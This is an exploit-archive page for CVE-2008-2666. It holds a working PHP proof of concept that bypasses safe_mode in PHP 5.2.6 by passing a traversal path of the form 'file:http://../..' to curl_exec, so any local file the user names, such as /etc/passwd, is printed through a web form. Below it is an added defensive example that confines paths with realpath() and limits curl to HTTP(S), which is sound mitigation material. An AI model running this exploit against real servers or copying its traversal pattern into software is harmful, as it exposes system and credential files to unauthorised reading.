PHP 5.2.6 safe_mode bypass PoC

2008-06-28 / 2008-06-29
Risk: Medium
Local: Yes
Remote: No
CWE: CWE-22


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: None
Availability impact: None

<?php
/*
 Exploit for CVE-2008-2666: http://cxsecurity.com/research//55
 Original URL http://cxsecurity.com/achievement_exploitalert/10

 safe_mode Bypass PHP 5.2.6
 by Maksymilian Arciemowicz
 http://cxsecurity.com
 cxib [at] cxsecurity [dot] com

 How to fix?
 Do not use safe_mode as a main safety
*/

echo "<PRE><P>This is exploit from <a href=\"http://cxsecurity.com\">http://cxsecurity.com</a> Maksymilian Arciemowicz"
    ."<p>Script for legal use only."
    ."<p>PHP 5.2.6 safe_mode bypass"
    ."<p>More: <a href=\"http://cxsecurity.com/news/0/0x24\">http://cxsecurity.com/news/0/0x24</a>"
    ."<p><form name=\"form\" action=\"http://".$_SERVER["HTTP_HOST"].htmlspecialchars($_SERVER["SCRIPT_NAME"])."\" method=\"post\">"
    ."<input type=\"text\" name=\"file\" size=\"50\" value=\"\">"
    ."<input type=\"submit\" name=\"studiaNAuwrCZYpwrTOmanipulacja\" value=\"Show\"></form>\n";

// A directory literally named "http:" beside the script lets the relative
// path "http://../../.." below resolve on the filesystem. The author notes
// the bypass can also work without it.
if (!is_dir(dirname(__FILE__)."/http:")) { // can work without this requirement
    if (!is_writable(dirname(__FILE__)))
        die("<b>I can't create http: directory</b>");
    mkdir("http:");
}

// Target path from GET or POST (a register_globals $file is honoured too).
if (empty($file) and empty($_GET['file']) and empty($_POST['file']))
    die("\n");
if (!empty($_GET['file']))  $file = $_GET['file'];
if (!empty($_POST['file'])) $file = $_POST['file'];

// The bypass: curl is handed a "file:" URL whose path starts with "http://"
// and climbs out with "../"; curl_exec() prints the file straight to output,
// so a successful read shows the file before the closing message.
if (curl_exec(curl_init("file:http://../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../".$file)) and !empty($file))
    die("<B><br>best regards cxib from cxsecurity.com</B></FONT>");
elseif (!empty($file))
    die("<FONT COLOR=\"RED\"><CENTER>Sorry... File <B>".htmlspecialchars($file)."</B> doesn't exists or you don't have permissions.</CENTER></FONT>");
?>
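The advisory's fix advice is to stop treating safe_mode as the security boundary. The following is an added example, not code from the advisory or from cxsecurity.com, of the application-level containment that replaces it: the user-supplied name is canonicalised with realpath() and checked against an allowed base directory, and any value carrying a URL scheme (including "file:" and "http:") is refused before it can reach a stream wrapper or curl. The base directory, the function names and the CURLOPT_PROTOCOLS availability (PHP 5.2.10 with libcurl 7.19.4 or later) are assumptions for the example.

```php
<?php
// Added example, not part of the cxsecurity PoC. Assumes readable files live
// under $base_dir and nothing outside that tree may ever be returned.

/**
 * Resolve $user_file inside $base_dir and return the canonical path, or
 * false if it names a scheme, contains NUL, escapes the base, or is not a
 * regular file.
 */
function contained_path($base_dir, $user_file)
{
    // NUL bytes truncate paths in older PHP file functions: reject outright.
    if (strpos($user_file, "\0") !== false) {
        return false;
    }
    // Anything shaped like "scheme:" (file:, http:, php:, data:, ...) is
    // refused, so the caller can never pick a stream wrapper or a curl
    // scheme. This also kills the "http://../../.." string from the PoC.
    if (preg_match('#^[a-z][a-z0-9+.\-]*:#i', $user_file)) {
        return false;
    }
    $base = realpath($base_dir);
    if ($base === false) {
        return false;
    }
    $base = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;

    // realpath() resolves "..", symlinks and odd directory names alike, and
    // returns false when the target does not exist.
    $real = realpath($base . $user_file);
    if ($real === false || !is_file($real)) {
        return false;
    }
    // Compare against the base including the trailing separator so that
    // /srv/data2/x is not accepted for base /srv/data.
    if (strncmp($real, $base, strlen($base)) !== 0) {
        return false;
    }
    return $real;
}

/**
 * Fetch a remote URL with curl while refusing every local scheme, so a value
 * such as "file:http://../../etc/passwd" cannot touch the filesystem.
 * CURLOPT_PROTOCOLS / CURLPROTO_* are assumed available (PHP >= 5.2.10,
 * libcurl >= 7.19.4).
 */
function fetch_http_only($url)
{
    if (!preg_match('#^https?://#i', $url)) {
        return false;
    }
    $ch = curl_init($url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_PROTOCOLS, CURLPROTO_HTTP | CURLPROTO_HTTPS);
    curl_setopt($ch, CURLOPT_REDIR_PROTOCOLS, CURLPROTO_HTTP | CURLPROTO_HTTPS);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, false);
    $body = curl_exec($ch);
    curl_close($ch);
    return $body;
}

// Usage: $base_dir is an assumed location for this example.
$base_dir = dirname(__FILE__) . '/public';
$file = isset($_GET['file']) ? $_GET['file'] : '';

$path = contained_path($base_dir, $file);
if ($path === false) {
    header('HTTP/1.0 403 Forbidden');
    exit;
}
readfile($path);
?>
```

With this in place the PoC's input "http://../../../../etc/passwd" fails at the scheme check, a plain "../../../../etc/passwd" fails the prefix check after realpath(), and a symlink planted under the base that points outside it fails the same check, none of which depends on safe_mode or open_basedir being enabled.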

References:

http://cxsecurity.com/issue/WLB-2008060054


Copyright 2017, cxsecurity.com
